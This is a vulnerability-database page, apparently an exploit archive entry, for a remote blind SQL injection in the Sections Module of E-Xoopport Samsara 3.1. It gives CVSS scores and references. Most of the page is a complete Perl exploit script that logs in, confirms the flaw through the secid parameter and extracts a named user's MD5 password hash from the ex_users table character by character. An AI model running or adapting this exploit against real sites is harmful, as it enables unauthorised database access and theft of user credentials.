E-Xoopport - Samsara <= v3.1 (Sections Module 2) Remote Blind SQL Injection

2010.09.23
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # [0-Day] E-Xoopport - Samsara <= v3.1 (Sections Module 2) Remote Blind SQL Injection Exploit # Author/s: _mRkZ_ & Dante90, WaRWolFz Crew # Created: 2010.09.12 after 0 days the bug was discovered. # Web Site: www.warwolfz.org use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; $^O eq 'MSWin32' ? system('cls') : system('clear'); print " E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit +---------------------------------------------------+ | Script: E-Xoopport | | Affected versions: 3.1 | | Bug: Remote Blind SQL Injection (Sections Module) | | Author/s: _mRkZ_ & Dante90, WaRWolFz Crew | | Web Site: www.warwolfz.org | +---------------------------------------------------+ "; if (@ARGV != 4) { print "\r\nUsage: perl expolit_name.pl <VictimeHost> <YourNick> <YourPass> <NickToHack>\r\n"; exit; } $host = $ARGV[0]; $usr = $ARGV[1]; $pwd = $ARGV[2]; $anickde = $ARGV[3]; $anick = '0x'.EncHex($anickde); print "[+] Logging In...\r\n"; my %postdata = ( uname => "$usr", pass => "$pwd" ); $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); my $req = (POST $host, \%postdata); my $cookies = HTTP::Cookies->new(); $request = $ua->request($req); $ua->cookie_jar($cookies); $content = $request->content; if ($content =~ /<head><meta http-equiv="Refresh" content="0; URL=modules\/news\/" \/><\/head>/i) { print "[+] Logged in\r\n"; } else { print "[-] Fatal Error: username/password incorrect?\r\n"; exit; } print "[!] Retriving section id...\r\n"; $idi = 0; while ($idi != 11) { $idi++; $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); my $req = $host."/modules/sections/index.php?op=listarticles&secid=$idi"; $request = $ua->get($req); $ua->cookie_jar($cookies); $content = $request->content; if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) { $secid = $idi; last; } } if(!defined $secid) { print "[-] Fatal Error: Section id not found!\r\n"; exit; } else { print "[+] Section id '$secid' retrieved\r\n"; } print "[!] Checking path...\r\n"; $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); my $req = $host."/modules/sections/index.php?op=listarticles&secid=$secid"; $request = $ua->get($req); $ua->cookie_jar($cookies); $content = $request->content; if ($content =~ /Ecco i documenti della sezione/i) { print "[+] Correct Path\r\n"; } else { print "[-] Fatal Error: Wrong Path\r\n"; exit; } print "[!] Checking if vulnerability has been fixed...\r\n"; $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); my $req = $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+1=1"; $request = $ua->get($req); $ua->cookie_jar($cookies); $content = $request->content; if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) { print "[+] Vulnerability has not been fixed...\r\n"; } else { print "[-] Fatal Error: Vulnerability has been fixed\r\n"; open LOGG, ">log.html"; print LOGG $content; close LOGG; exit; } print "[!] Checking nick to hack...\r\n"; $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); my $req = $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),32,1))>0"; $request = $ua->get($req); $ua->cookie_jar($cookies); $content = $request->content; if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) { print "[+] Nick exists...\r\n"; } else { print "[-] Fatal Error: Nick does not exists\r\n"; exit; } print "[!] Exploiting...\r\n"; my $i = 1; while ($i != 33) { my $wn = 47; while (1) { $wn++; $ua = LWP::UserAgent->new; $ua->agent("Mozilla 5.0"); my $req = $host."/modules/sections/index.php?op=listarticles&secid=$secid+AND+ascii(substring((SELECT+pass+FROM+ex_users+WHERE+uname=$anick+LIMIT+0,1),$i,1))=$wn"; $request = $ua->get($req); $ua->cookie_jar($cookies); $content = $request->content; if ($content =~ /<center>Ecco i documenti della sezione <b>(.+)<\/b>/ig) { $pwdchr .= chr($wn); $^O eq 'MSWin32' ? system('cls') : system('clear'); PrintChars($anickde, $pwdchr, $secid); last; } } $i++; } print "\r\n[+] Exploiting completed!\r\n\r\n"; print "Visit: www.warwolfz.net\r\n\r\n"; sub PrintChars { $anick1 = $_[0]; $chars = $_[1]; $secid = $_[2]; print " E-Xoopport - Samsara <= v3.1 (Sections Module) Remote Blind SQL Injection Exploit +---------------------------------------------------+ | Script: E-Xoopport | | Affected versions: 3.1 | | Bug: Remote Blind SQL Injection (Sections Module) | | Author/s: _mRkZ_ & Dante90, WaRWolFz Crew | | Web Site: www.warwolfz.org | +---------------------------------------------------+ [+] Logging In... [+] Logged in [!] Retriving section id... [+] Section id '$secid' retrived [!] Checking path... [+] Correct Path [!] Checking if vulnerability has been fixed... [+] Vulnerability has not been fixed... [!] Checking nick to hack... [+] Nick exists... [!] Exploiting... [+] ".$anick1."'s md5 Password: $chars "; } sub EncHex { $char = $_[0]; chomp $char; @trans = unpack("H*", "$char"); return $trans[0]; }

References:

http://xforce.iss.net/xforce/xfdb/61808
http://www.exploit-db.com/exploits/15004
http://secunia.com/advisories/41397
http://packetstormsecurity.org/1009-exploits/exoopport-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top